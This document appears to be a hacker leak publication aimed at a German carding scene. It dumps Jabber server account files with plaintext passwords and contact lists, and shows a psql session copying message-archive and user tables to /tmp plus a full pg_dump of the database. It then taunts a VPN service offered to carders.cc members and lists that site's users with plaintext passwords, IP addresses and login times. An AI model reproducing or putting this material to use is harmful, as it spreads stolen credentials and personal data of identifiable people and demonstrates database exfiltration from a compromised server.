stamp='20100805T11:37:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281008315' xdbns='jabber:iq:last'/></xdb> + +luigi100.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>frauke</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>luigi100</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T03:25:49'>registered</x></query><query xmlns='jabber:iq:last' last='1281300897' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +naik.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>c15g4</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>naik</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:15:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281007640' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='annie90@jabber.ccc.de' name='' subscription='both'><group>Jabber</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='from' ask='subscribe'><group>Buddies</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +nitex.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>19083862</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>nitex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:37:54'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281271005' xdbns='jabber:iq:last'/></xdb> + +racketeer.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>neumsche</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>racketeer</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T13:32:38'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='' subscription='to'><group>swiss</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='both'><group>swiss</group></item></query><query xmlns='jabber:iq:last' last='1281291383' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +s0xtech.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>s0xy00</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>s0xtech</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T07:19:17'>registered</x></query><query xmlns='jabber:iq:last' last='1280825558' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +sinned.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>vollidiot</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>sinned</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T19:03:31'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280862994' xdbns='jabber:iq:last'/></xdb> + +st3ffl0r.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>HanZ123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>st3ffl0r</username><name>Ich</name><email>iamweasel@marsmail.de</email><x xmlns='jabber:x:delay' stamp='20100805T11:28:40'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAF8AAABgCAIAAAD0AjnaAAAAA3NCSVQICAjb4U/gAAAgAElEQVR42oy8WZM...Mv9pCZHqyIEyWcPpVmUv22TEF3l1Kny8Js4m7WTLwiBvyVZn+a5hF/ENYv/jETXn6+WbfO0vYK7nQ1q+MOm5Hc8Nuu23wn2TSuNvKNqKcLc8efYMALyFjEOFaAQHV45gl85/x2yGLznPZ6jM75ju8LsTILanf/GAL4Ybff0qZ9Y8DcN5tCO3/QgU3B1qvXv3n9cgfNLl5Yvlb3PGXttQkAzPbZSNvvmq5yDV8b+PHjYIo8n1+vLpv2es77Hg1wvny59K8JuP+T9PTAv9D/H9sBRgei4KAAAAAElFTkSuQmCC</BINVAL></PHOTO></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281011278' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +syntax\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>seckin!kilic!91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntax\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:44:55'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'><message id='IoS3Q-21' to='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' from='naik@jabber-swissfaking.net/spark'><x xmlns='jabber:x:event'/><x xmlns='jabber:x:delay' from='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' stamp='20100805T11:07:06'>Offline Storage</x></message></foo><query xmlns='jabber:iq:last' last='1280928948' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='to' subscribe=''><group>Swiss</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='to'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='to' subscribe=''><group>Swiss</group></item><item jid='el!t3@jabber-swissfaking.net' name='eL!t3' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='yaboybigt@jabber-swissfaking.net' name='yaboybigT' subscription='to'><group>Swiss</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='both'><group>Swiss</group></item><item jid='syntex@jabber-swissfaking.net' name='syntex' subscription='both'><group>Swiss</group></item></query></xdb> + +syntex.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>swissjabber</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:33:58'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281301960' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +theird21.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>00025879</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>theird21</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:05:17'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280927487' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +the|biggie.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>aggro123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>the|biggie</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T20:33:39'>registered</x></query><query xmlns='jabber:iq:last' last='1280970373' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='from' ask='subscribe'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +trickz.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>crazyfrog1234</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>trickz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T21:41:38'>registered</x></query><res id='spark'/><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='from'/><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='crankz@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281303248' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +w!cked.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>fvcxy--</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w!cked</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T16:19:22'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280852527' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +w00dka.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>as_tave_myliu</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w00dka</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T18:07:26'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281222732' xdbns='jabber:iq:last'/></xdb> + +weareone.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Amstaff</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>weareone</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:30:36'>registered</x></query><res id='spark'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='dotsyn@jabber-swissfaking.net' name='dotsyn' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='donteron@thesecure.biz' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1280970363' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +yaboybigt.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>73818444</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>yaboybigt</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T14:05:19'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281277327' xdbns='jabber:iq:last'/></xdb> + +# psql openfire openfire +Password for user openfire: +Welcome to psql 8.3.11, the PostgreSQL interactive terminal. + +openfire=# \l + List of databases + Name | Owner | Encoding +-----------+----------+----------- + openfire | openfire | UTF8 + postgres | postgres | SQL_ASCII + template0 | postgres | SQL_ASCII + template1 | postgres | SQL_ASCII +(4 rows) + +openfire=# \c openfire +You are now connected to database "openfire". +openfire=# \d + List of relations + Schema | Name | Type | Owner +--------+----------------------+-------+---------- + public | ofconparticipant | table | openfire + public | ofconversation | table | openfire + public | ofextcomponentconf | table | openfire + public | ofgroup | table | openfire + public | ofgroupprop | table | openfire + public | ofgroupuser | table | openfire + public | ofid | table | openfire + public | ofmessagearchive | table | openfire + public | ofmucaffiliation | table | openfire + public | ofmucconversationlog | table | openfire + public | ofmucmember | table | openfire + public | ofmucroom | table | openfire + public | ofmucroomprop | table | openfire + public | ofmucservice | table | openfire + public | ofmucserviceprop | table | openfire + public | ofoffline | table | openfire + public | ofpresence | table | openfire + public | ofprivacylist | table | openfire + public | ofprivate | table | openfire + public | ofproperty | table | openfire + public | ofpubsubaffiliation | table | openfire + public | ofpubsubdefaultconf | table | openfire + public | ofpubsubitem | table | openfire + public | ofpubsubnode | table | openfire + public | ofpubsubnodegroups | table | openfire + public | ofpubsubnodejids | table | openfire + public | ofpubsubsubscription | table | openfire + public | ofremoteserverconf | table | openfire + public | ofroster | table | openfire + public | ofrostergroups | table | openfire + public | ofrrds | table | openfire + public | ofsaslauthorized | table | openfire + public | ofsecurityauditlog | table | openfire + public | ofuser | table | openfire + public | ofuserflag | table | openfire + public | ofuserprop | table | openfire + public | ofvcard | table | openfire + public | ofversion | table | openfire +(38 rows) + +openfire=# COPY ofmessagearchive TO '/tmp/m_lawgs'; +COPY 2190 + +openfire=# COPY ofuser TO '/tmp/u_lawgs'; +COPY 313 + +openfire=# \q + +# pg_dump -U openfire openfire > /tmp/full_db +Password: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| fickmaus@jabber-swissfaking.net: | +| na carders brauch diesesmal wohl länger wa? | +| triple@jabber-swissfaking.net: | +| Jo | +| die haben immer noch ka | +| wie die lücke ist | +| ^^ | +|____________________________________________________________________| + +Why don't you shut up and go administrate your own board, +smarty-pants? Owait, Garcon! Make us a sandwich instead, you seem to +know your stuff when it comes to ordering a la carte. + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------=========={ Vpn24.org }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ + ~ | ||( );, + ( ,;.)-\ / ';, + \ ( \ ( + || \\ + /_( /_( +_____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Liebe Carders.CC Member, | +| | +| Wir sind wieder da und haben euch Top Angebote mitgebracht :) | +| | +| Wir bieten euch 100% non-logging OpenVPN, Socks5 und SSH Socks | +| Zugang auf unserem eigenen dedicated Server welcher in Russland | +| steht, absolut unantastbar für Deutsche Behörden. Unser | +| kompletter Service ist automatisiert, ihr könnt also schon in | +| wenigen Minuten 100% anonym unterwegs sein. | +| | +| ... | | +| VPN | Socks5 | +| Secure Connection | Secure Connection | +| Encryption AES-1024 | Encryption AES-512 | +|_________________________________|__________________________________| + +They offer the carders.cc members 100% non-logging proxies on their +own dedicated server which is located in Russia. They say that there +is no way for German authorities to get access to it and that their +service is fully automatic. The vpn connections are encrypted with +AES-1024 and the socks5 proxies are encrypted with AES-512. + +And that sounds awesome! You even invented two new encryptions? Let's +have a look at your webserver first, but, again, before we start, here +is a list (user:plain password:ip:date) from your website: + +janitor1:nroknetsr3g:87.118.118.37:January 6, 2011, 8:33 pm +jack123:heimatbrief:92.241.190.230:January 3, 2011, 3:54 pm +shore:shoreshore:202.71.103.246:January 6, 2011, 6:28 pm +hansi3000:w2z_RKDUU:212.117.177.110:January 5, 2011, 4:10 pm +tarnung91:frauholle49:78.52.52.123:January 4, 2011, 11:54 am +djdalio:123123:95.33.214.37:January 3, 2011, 5:03 pm +selfcut:rittersport:88.76.106.196:January 3, 2011, 1:10 pm +donkey:YX!"as78:84.183.121.124:January 3, 2011, 9:07 am +obama123:derneger123:84.137.90.85:January 5, 2011, 5:43 pm +neon1011:hassen11:91.43.254.141:January 3, 2011, 11:54 am +f18black:pizza1:91.33.20.147:January 6, 2011, 2:37 pm +hilli:ickeget6:85.17.161.84:January 6, 2011, 2:35 pm +schmidi327:g5fkigd2:95.33.42.207:January 6, 2011, 11:39 pm +12dima12:jafCc8Nk:212.117.172.231:January 3, 2011, 9:03 pm +blackmatrix:o75ev14J:87.185.157.32:January 7, 2011, 4:16 pm +hanswurst:volkan:92.76.11.157:January 5, 2011, 10:41 pm +ginal406:e*!ohWt7:92.241.190.253:January 3, 2011, 8:14 pm +edgeee:azerty123:92.241.165.69:January 7, 2011, 1:00 am +loowmanz:lowlowlow123:93.202.153.197:January 3, 2011, 7:51 am +basha:kriminell:92.241.165.69:January 4, 2011, 9:42 pm +zezol:4iP]XT4)om:79.170.124.248:January 3, 2011, 8:02 am +duden:galaxy:92.241.190.253:January 6, 2011, 9:35 pm +pill3:jackass123:212.117.172.231:January 5, 2011, 10:57 am +darkt0wn:marvin88:217.72.222.183:January 5, 2011, 8:06 pm +pyrodeath:b35ngf%:78.48.108.252:January 4, 2011, 12:55 pm +conviction:ichbingeil:92.241.190.253:January 3, 2011, 5:12 pm +blade1932:exaguqa5:92.241.190.253:January 3, 2011, 2:51 pm +hackbart2:twd2005:92.241.190.253:January 3, 2011, 10:22 am +juryrusski:jocklerhans:77.0.30.113:January 4, 2011, 8:47 pm +h1xx3r:trustno1:84.23.74.92:January 4, 2011, 9:04 pm +romulus89:192837465:80.123.42.135:January 3, 2011, 12:26 pm +deluxe0160:tomtom:92.228.173.201:January 7, 2011, 10:08 pm +hanshans123:hanshans:212.117.161.80:January 4, 2011, 12:43 am +sanisan:19n4schk4tz385:84.184.246.137:January 6, 2011, 12:15 am +pan1c:tigerpommes:92.241.190.253:January 5, 2011, 11:43 am +revar:puppetteer:92.241.165.69:January 4, 2011, 1:45 pm +epoepo:union84:92.241.190.253:January 4, 2011, 1:37 pm +offlinejack:Jodelhe1n:88.76.253.194:January 6, 2011, 8:57 pm +weedtwo:70301995:92.241.190.253:January 6, 2011, 5:18 pm +pann0:pannopasch0:79.198.146.182:January 6, 2011, 6:02 pm +eve1992:sacred:88.67.149.150:January 6, 2011, 10:03 am +hi:suPPort_masterPass88:212.117.165.197:January 3, 2011, 2:27 am +det0x:veronika:92.241.190.253:January 4, 2011, 3:19 pm +malakas2:internet:212.117.172.231:January 3, 2011, 5:34 am +fahne:23102007:78.50.87.217:January 4, 2011, 6:30 pm +alanka:159369:85.25.165.138:January 3, 2011, 9:50 am +pfanner:deinemudda:92.204.37.77:January 3, 2011, 12:53 pm +delphinko:aLLanKoy0:87.118.118.37:January 3, 2011, 8:20 pm +timetraveller:a3Pq71ryK1:79.229.42.88:January 7, 2011, 8:56 pm +logg23:1q2w3e4r5t6z7u8i:212.117.172.231:January 6, 2011, 4:49 pm +teppich:oog4weeT1acu:157.95.211.201:January 5, 2011, 12:49 am +andreas7411:123456789a:88.65.104.195:January 3, 2011, 10:23 pm +n3v10:uLeiDee7:212.117.172.231:January 4, 2011, 1:24 pm +frezorx:123456:92.231.125.179:January 4, 2011, 3:11 am +winkel72:berlin123:193.107.16.122:January 3, 2011, 9:34 pm +trinx:meli1993:92.241.190.253:January 4, 2011, 3:38 pm +c4sh1:mkz4kzj:80.121.99.73:January 7, 2011, 1:04 am +tais46:spoiler:69.172.133.146:January 3, 2011, 1:36 pm +whazun:daspw123:93.195.74.65:January 4, 2011, 11:44 am +anubis:xy200xyx:79.213.81.205:January 5, 2011, 8:16 pm +hugo21:901051901051:91.54.21.252:January 4, 2011, 12:14 pm +doomlord:oxford:91.51.166.181:January 3, 2011, 6:53 pm +sense88:pitbull:91.66.61.177:January 5, 2011, 7:11 am +heavygun:vpn24private:91.6.0.76:January 6, 2011, 10:26 am +tombi:Spiele:92.241.190.253:January 5, 2011, 1:08 pm +messias91:qaywsx:92.241.165.69:January 6, 2011, 4:29 pm +lryzx33:deutschlandhackedbysolme:91.121.82.175:January 4, 2011, 6:04 pm +dre4m90:chillen:188.104.227.204:January 5, 2011, 10:56 am +slumski:Harley23:109.193.150.182:January 3, 2011, 7:55 pm +theultralooser:921234:92.241.190.81:January 4, 2011, 8:35 pm +keystyle:firatfirat911:92.241.165.69:January 6, 2011, 7:33 pm +hund123456:hund123456:46.114.42.253:January 4, 2011, 9:56 pm +chiller1337:episodeone:92.241.190.253:January 5, 2011, 11:48 am +turboprinz:886988:93.211.71.197:January 5, 2011, 9:25 pm +silverfox:tamil94thenud*:93.218.92.119:January 4, 2011, 9:22 am +ikas2:k7gh8uc3ph:77.11.24.196:January 7, 2011, 12:33 am +mrmcfly:vpn2426112004:213.163.65.50:January 6, 2011, 4:53 pm +weedtaxi:dura2131:93.222.176.113:January 4, 2011, 8:17 pm +boxer1:daniel:188.193.12.78:January 5, 2011, 7:02 pm +newb1:hans1234:92.241.165.69:January 6, 2011, 2:56 pm +bichlord:michael12B:94.217.109.99:January 4, 2011, 5:52 pm +neonaut:derotter:212.117.161.80:January 3, 2011, 11:45 am +abs0lut:liberate012:92.241.165.69:January 3, 2011, 3:53 pm +thalia:stachnik:81.210.157.177:January 4, 2011, 12:12 pm +dudgeri:dude123:212.117.165.197:January 3, 2011, 10:56 am +arider:amp483:77.189.15.2:January 4, 2011, 8:54 pm +iodas1:hallo123:87.147.65.130:January 4, 2011, 8:42 pm +hans2000:yxcvbnm22:84.59.141.5:January 6, 2011, 12:05 am +jungeguter:toko29473:79.195.50.220:January 3, 2011, 4:40 pm +th3sh4dow:han2jo4cu:88.69.160.243:January 7, 2011, 7:26 pm +pwnny:faker123:77.176.234.57:January 4, 2011, 9:16 am +papo00:papo0815:84.119.53.9:January 5, 2011, 8:24 pm +thehen:duhurensohn:77.22.65.135:January 3, 2011, 11:21 pm +random9999:dfds67621dd9999:199.48.147.41:January 3, 2011, 7:03 pm +zorator:1q2w3e4r:91.121.72.221:January 3, 2011, 7:48 pm +xr34ct0r:spelock1909:212.117.163.21:January 3, 2011, 7:56 pm +deesr:timsilinsi:93.94.245.2:January 7, 2011, 6:19 pm +juliasutter:01305806:91.89.165.7:January 3, 2011, 5:22 pm +davidche:miezekatze:95.157.23.65:January 4, 2011, 10:37 pm +k1xy0:1qayxcv:92.75.20.99:January 5, 2011, 2:20 am +hyperion:sexysexy:212.117.172.231:January 3, 2011, 11:17 pm +emrano:go,schosch:92.241.165.69:January 3, 2011, 1:58 pm +razer111:hunter1:95.211.99.92:January 3, 2011, 11:30 am +asus123:intelatom:82.195.232.218:January 7, 2011, 4:41 pm +fruchtii:a1b2c3d4:87.118.118.37:January 3, 2011, 8:20 pm +mcott:123456:92.241.165.69:January 3, 2011, 1:38 pm +input:kingild:188.193.40.32:January 3, 2011, 6:15 pm +snowghost:7LKCFwm:78.53.114.62:January 5, 2011, 12:05 pm +fuckyou:fuckyou:212.117.177.110:January 6, 2011, 11:48 pm +snowmann:passwort:84.133.162.225:January 6, 2011, 7:43 am +nate23:hallo123:188.195.206.85:January 6, 2011, 4:10 am +smilenike:nippellecken:92.241.190.253:January 6, 2011, 10:33 pm +mastablasta:p4r4d153c1ty:62.141.39.222:January 3, 2011, 10:15 am +beware:er.,fs:93.213.21.9:January 3, 2011, 6:45 pm +5liter:Walter50:87.118.118.37:January 3, 2011, 4:49 am +d3struction:samson123:109.77.48.51:January 3, 2011, 4:48 pm +traden90:1234abcder:92.241.190.253:January 3, 2011, 5:46 pm +kaliber:kaliber44:79.218.97.68:January 6, 2011, 1:15 pm +styles:736286:212.117.172.231:January 3, 2011, 2:53 pm +thatslife:katze2:80.143.108.186:January 3, 2011, 11:49 pm +n8zm5gg:kfkfgkfg1:199.48.147.40:January 6, 2011, 12:58 pm +sparkasse:ficken:212.117.172.231:January 5, 2011, 2:17 am +p1r0x:timtimtim12:88.153.214.11:January 5, 2011, 1:31 pm +reideen:1kimmerle2:92.241.190.253:January 3, 2011, 10:03 am +shadowgamer:lumega34:84.19.169.236:January 6, 2011, 10:32 pm +kasanova:gentleman:92.241.190.253:January 4, 2011, 11:25 pm +anonymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:06 pm +thepu:asdf545:91.60.211.53:January 6, 2011, 4:26 pm +ixam123:chichi12345:79.240.150.109:January 4, 2011, 10:31 am +scanner1337:NL0AMGGG:93.221.58.122:January 3, 2011, 10:43 pm +xelni:kir123:92.241.190.253:January 6, 2011, 8:06 pm +nexus88:01230123:80.131.74.225:January 6, 2011, 2:10 am +meball:MeBall456:92.241.168.90:January 4, 2011, 7:39 pm +fuckdawn:former300:92.241.190.253:January 3, 2011, 12:06 pm +kdkdkd:abcabc123:85.177.152.182:January 4, 2011, 7:34 pm +nicvandebigdick:mezzomix:93.219.15.61:January 6, 2011, 3:52 am +alfalfa:57596300:85.176.120.193:January 3, 2011, 3:53 pm +kevin4ual:iloveu:92.241.190.253:January 4, 2011, 10:25 pm +simonsemmler:gangbang:92.78.143.171:January 3, 2011, 10:29 am +kuchen:asdasdasd:212.117.165.197:January 3, 2011, 2:21 am +peters:Bobchen2:77.181.106.195:January 3, 2011, 6:41 pm +anoymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:05 pm +pitbull69:9g3qW$23r$SZg8§$2GD3rg83:87.122.14.183:January 5, 2011, 8:45 pm +aschi2131:dura2131:93.222.176.113:January 4, 2011, 8:17 pm +testuser0:hurensohn:93.94.245.129:January 7, 2011, 4:20 am +makko:Lq=D)G92T2:79.228.238.216:January 3, 2011, 3:05 am +slash:busenbusen:82.195.232.218:January 4, 2011, 12:50 pm +thereplacer:fuckmyass:93.228.147.44:January 4, 2011, 6:48 pm +xxx3xxx4:derneger:92.241.190.253:January 5, 2011, 12:51 am +faxxer:hdgdla:90.134.58.200:January 5, 2011, 8:10 pm +magi007:imcool123:80.121.47.36:January 3, 2011, 2:47 pm +crack:novoline21:88.73.103.201:January 7, 2011, 12:55 am +bekanntmachungen:BEKANNTMACHUNGEN:89.204.137.175:January 3, 2011, 3:32 pm +ripit:gangbang123:212.117.172.231:January 4, 2011, 12:34 pm +mttsmtts:IgjTu0800zSv:93.134.103.213:January 3, 2011, 2:08 pm +dingdong:progamer:79.245.244.195:January 4, 2011, 12:13 pm +sa1nt:krankheit:91.7.92.101:January 5, 2011, 3:12 am +skilled:12345asdfg:94.23.114.4:January 4, 2011, 11:22 am +juden:test123:95.208.15.191:January 6, 2011, 12:13 pm +lolcat:i26nv1:79.204.36.137:January 3, 2011, 4:43 pm +docstrange:.denis.1203.:78.34.37.56:January 3, 2011, 3:56 pm 